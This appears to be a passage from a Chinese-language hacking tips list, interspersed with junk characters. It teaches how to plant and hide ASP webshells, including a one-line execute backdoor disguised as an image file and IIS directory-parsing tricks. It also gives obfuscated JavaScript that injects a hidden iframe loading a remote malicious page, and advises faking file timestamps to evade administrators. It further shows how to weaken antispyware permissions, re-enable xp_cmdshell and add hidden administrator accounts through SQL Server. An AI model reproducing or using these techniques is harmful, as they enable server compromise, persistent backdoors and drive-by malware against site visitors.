拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 b: P x/ _4 l
通过web访问ASP木马:http://ip/images../news.asp?action=login; C/ L7 @+ V" R/ ^3 j% G7 ~
如何删除非标准目录:rmdir images..\ /s
5 e9 T# B% K$ @+ i2 J4 H/ R! }2 u2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:/ [7 s2 F" Y9 Q2 u* T: }
mkdir programme.asp
1 u$ b, B8 h7 U! \6 h( j新建1.txt文件内容:<!--#include file=”12.jpg”--> Q) J6 I* q* H6 r0 N& n
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件) M1 e( v8 E% e
attrib +H +S programme.asp
" D( R6 m9 L$ ^/ r, K8 M( U通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt' _: b5 x# Q; `" l, A: N
, ^6 n/ p' t0 H( I$ X54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。 F Z9 l5 z, o. ~' Q3 u
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; q: K4 l, z) I) N# z( W w
3 o% K3 I8 Z! u1 R t, A55、JS隐蔽挂马2 Q, a4 `$ R0 n' F' b+ L
1.
8 Z- Z; `" t. e2 D- z3 avar tr4c3="<iframe src=ht";
7 `' o- S* g: ?, Wtr4c3 = tr4c3+"tp:/";
, d- ~+ s3 X( ^, b+ wtr4c3 = tr4c3+"/ww";' @! R* M/ p3 w+ F6 R( m
tr4c3 = tr4c3+"w.tr4";) s5 k8 \" t) ?7 d
tr4c3 = tr4c3+"c3.com/inc/m";
2 O$ P; P5 \$ @/ R# Gtr4c3 = tr4c3+"m.htm style="display:none"></i";# d: B& @& _3 ]9 ~" X! @
tr4c3 =tr4c3+"frame>'";. c, |- H C; S z+ k
document.write(tr4c3);
8 H3 g2 Z+ Y3 b避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。+ S+ m" {2 S( I( d
! i4 F! e6 N8 P2 Z( A2 P, D
2." e8 a4 d3 P1 n- x& g* z# v
转换进制,然后用EVAL执行。如* M! t G$ x; _: `& B1 w, x( n
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
- G b. o+ ]- f, S% y" H不过这个有点显眼。
4 X! p, c R! l9 |7 R1 U3 i, v* d3.
; K/ G: D3 {" U" x! |document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');2 Q9 c: T9 s1 q1 S; v
最后一点,别忘了把文件的时间也修改下。1 G. u7 R+ O- N- p" V! Z
* |6 P# F1 \4 v0 t
56.3389终端入侵常用DOS命令: l8 u7 a9 d) N. P" X
taskkill taskkill /PID 1248 /t
{2 l7 P' C, }6 J* Z
, S; c' g5 f! ?, ^tasklist 查进程
+ k; n3 Z+ n) P" S
. r! _3 N9 a3 W: F* H2 F3 Kcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限8 V; K8 @0 F% _. w" a
iisreset /reboot) l% H1 o2 H& v+ Z/ w# c
tsshutdn /reboot /delay:1 重起服务器& a, ~) j$ N5 L- s
, |. H8 D) c% b4 D' r, G7 hlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,$ k! p8 t) I, l3 Z' Z& `) Z# c
- S3 s. g7 l' v: ?5 @2 _( q7 aquery user 查看当前终端用户在线情况
4 u, [! }: K* V6 o* x. k0 B9 r: a4 y- `' _, [0 M' m
要显示有关所有会话使用的进程的信息,请键入:query process *
1 |3 N. |4 @5 m0 O! l
, g: x0 W+ V0 Q3 f" H要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2/ d7 V: {* V9 H! Z* i) ?6 @+ O9 C/ O
- m' j& ?; A, K9 K要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2& T% R& V9 _2 D2 E% W8 a
: j: C$ f3 S9 f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02: Q: B4 Q1 b7 y5 _
. X- n d6 G+ ^* M) Z2 C6 Z* _
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
; t8 ?$ S$ b! G7 I* H7 i1 b9 d7 k
6 r0 h% n# s7 x: i3 Z命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
& ?& K- ?; s- d+ U0 c, p
6 j, A) r/ g4 Q- n$ S* P( F# j命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。6 g& J- ]( r( i) |) i, |3 U2 n
# q7 x; _: h& @; m5 {命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机! z+ n. h5 V8 \" G# w/ j
; z6 ]. ?7 R5 i0 X
56、在地址栏或按Ctrl+O,输入:: }& [. t/ `) ], G' f Q
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 }5 c# t. X& k) P7 b
- W( `6 V! J: v6 ~) R9 k0 |源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
, i& \: Y5 p/ w! f g$ g4 e+ ]* G4 ]
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,- I* N9 p! |% J3 y6 `
用net localgroup administrators是可以看到管理组下,加了$的用户的。4 M6 W5 z' x7 m
! G7 M( D( k; ?) W" D- v
58、 sa弱口令相关命令# |- q1 `: [- [) s e! Z- l% I
' O# T0 N/ f+ ^# @0 ?4 c一.更改sa口令方法:
9 C9 @, b: S8 i, b/ \: k用sql综合利用工具连接后,执行命令:" i- l a. @2 w* `0 H# C; L" k
exec sp_password NULL,'20001001','sa'
! a" D0 \+ r: P, r8 B3 ~(提示:慎用!)
' E2 z8 l7 k' r! X, B; j% N% Y
二.简单修补sa弱口令.$ A$ @ e" ~5 ?2 z. ?8 x5 V) a; |9 j
; {; Q5 V& [7 ~. a1 e3 ?方法1:查询分离器连接后执行:2 C) R1 T2 P4 T) l5 z; y. P
if exists (select * from& @: S, s& T+ z3 \8 B
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and+ q( ~) \! v# @2 P" o
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)9 B' M9 c/ V2 W+ r& N9 z
5 q/ R# l# I9 O( E9 {3 t6 V& Zexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'8 j8 u0 z b' l/ o+ O0 x
, }6 v$ z2 H9 p: K% ?4 v5 @GO
. Q, A) R4 P) b5 D% R6 u
I/ X$ Q! U& v: m然后按F5键命令执行完毕
1 v M" w( Q# p0 `6 v3 {& u) D
4 g0 U/ k5 h( R1 P9 @" r7 E0 A方法2:查询分离器连接后4 \# L" E! ]) s+ U, h1 c
第一步执行:use master
; X }5 L! I) m: d' T- x |第二步执行:sp_dropextendedproc 'xp_cmdshell'
0 u! H1 i$ j6 {- R/ u6 d+ G然后按F5键命令执行完毕
. d$ Y) Q- n: y& n. ^5 E) y0 v4 l; L1 s" z3 U! Z
0 S2 g; k+ f$ V- ]/ K* o
三.常见情况恢复执行xp_cmdshell.
# \0 J+ Q' S4 x* J: `$ x5 f4 }$ E" Q. E9 k# o0 d' z5 n& ^3 i/ I
- j- |! ^0 Z }+ R
1 未能找到存储过程'master..xpcmdshell'./ w/ ^+ `/ Q0 i1 R. Z% T
恢复方法:查询分离器连接后,) Q' s2 e$ O' `% D
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int2 `" P! W6 @3 o- F3 x- `8 L6 G, D
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
* e4 Z. y- I5 Z2 F然后按F5键命令执行完毕
: S+ K8 \9 }; i9 b! L; O& Y+ A3 L9 Z, T( ?
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
7 m; u- f/ `0 j, L% O恢复方法:查询分离器连接后,3 o+ S7 a# v% u1 M0 F$ q1 z$ b
第一步执行:sp_dropextendedproc "xp_cmdshell"
& M6 d3 s2 k% o2 m, |- X第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ h5 u0 u/ b; a然后按F5键命令执行完毕
( ?& r. ?' O$ R; V1 K0 [* T5 u4 F. ^) a1 G' o6 D' V
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)3 P- p5 j! d6 Y# D( N- w
恢复方法:查询分离器连接后,
' L" f0 J# F" W) z0 N第一步执行:exec sp_dropextendedproc 'xp_cmdshell'5 p, U# z6 {& p. Q. _( P, A' @
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
$ y% {$ [0 L: k* H, B然后按F5键命令执行完毕8 a. s. ]+ K X. `6 ]
$ a7 q" b9 U& R& P" {/ `) P$ p3 ~四.终极方法.( j# C6 U$ a0 O; |- p9 z7 S" o
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:& {! J3 C: f- Y8 |5 W
查询分离器连接后,2 @# N9 N+ m$ _8 a3 \
2000servser系统:
8 e4 y$ q( X8 ]* B4 a) h( F& kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 d- U; q) Q4 A. p7 @+ [$ X
f$ W5 Y" c ?+ Z5 z1 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& N& I3 D: ?( y8 p d& s- E( c9 o0 ?- K
xp或2003server系统:$ _4 M- c+ H9 `+ v* u0 P2 L" [
, C- ~+ S( v: Z: ~+ ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'* v9 C- O4 Z: I
& e2 i z1 {* N* z0 {9 L# q. u% fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ i4 g- q8 B, A! {$ ` V1 r |